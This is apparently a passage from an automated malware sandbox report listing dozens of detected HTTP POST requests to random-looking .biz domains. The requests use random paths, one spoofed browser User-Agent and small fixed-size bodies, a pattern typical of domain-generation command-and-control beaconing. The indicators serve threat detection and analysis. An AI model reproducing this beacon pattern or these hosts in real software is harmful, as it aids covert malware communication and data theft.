              Source: global trafficHTTP traffic detected: POST /ylviltyasno HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pectx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /ket HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zyiexezl.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /tukpf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: aatcwo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /pfxv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: banwyw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /tbjlfrgpjsj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wxgzshna.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /yroespvujukavm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wxgzshna.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /utmatjvdttvmj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kcyvxytog.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /lyeldophhxwh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zrlssa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /dtvapdfrlqmxxmr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nwdnxrd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /ekoddjskuurntxll HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jlqltsjvh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /ljkvkq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ereplfx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /m HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ptrim.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /ipraobeqvefqwo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xyrgy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /anxwhb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: htwqzczce.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /gbpwk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: znwbniskf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /kgrhqg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: htwqzczce.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /dleie HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kvbjaur.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /wmvbvpamjcuqeg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cpclnad.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /ayqsgvejwqqtuhlw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uphca.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /sfpm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mjheo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /ywpgeaid HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fjumtfnz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /vux HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wluwplyh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /iasdsuhvtygftfd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hlzfuyy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /kfxwsateoe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zgapiej.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /df HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rffxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /ewnr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jifai.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /prir HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xnxvnn.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /vfforoslwsi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cikivjto.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /bfwumbhax HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qncdaagct.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /wuqlqwd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ihcnogskt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /doxg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: shpwbsrw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /jsxjkxjpifqnuouu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kkqypycm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /niimxaprbqaffu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: shpwbsrw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /nfn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uevrpr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /monvvvssytjyx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fgajqjyhr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /xiubmulosfxjb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hagujcj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /fb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cjvgcl.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /ymxofohtmnuucvl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: neazudmrq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /gbk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sctmku.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /leprwccfmwjgljdl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pgfsvwx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /rbdqbpnxm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qcrsp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /m HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: aatcwo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /aumopkwtqjj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sewlqwcd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /mwaqiugfciuwk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dyjdrp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /nwtkmxcykx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kcyvxytog.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /rbaauabmruspy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: napws.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /miwimxtpafcu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nwdnxrd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /suayd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nwdnxrd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /wpmohqs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qvuhsaqa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /wggmqoohnhblgniy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ereplfx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /octb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: apzzls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /unku HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ptrim.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /hqtt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: krnsmlmvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /unuaesdvma HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ptrim.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /photgshiyqocqphc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nlscndwp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /rbvpvahvdptnmihm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bzkysubds.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /ntn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: znwbniskf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /lo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ltpqsnu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /pjj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vnvbt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /mprtttkxf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cpclnad.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /goqcyypv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ypituyqsq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mjheo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /gablvhtmh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ijnmvqa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /fhni HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wluwplyh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /dwgnvhk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tltxn.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /owal HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vgypotwp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
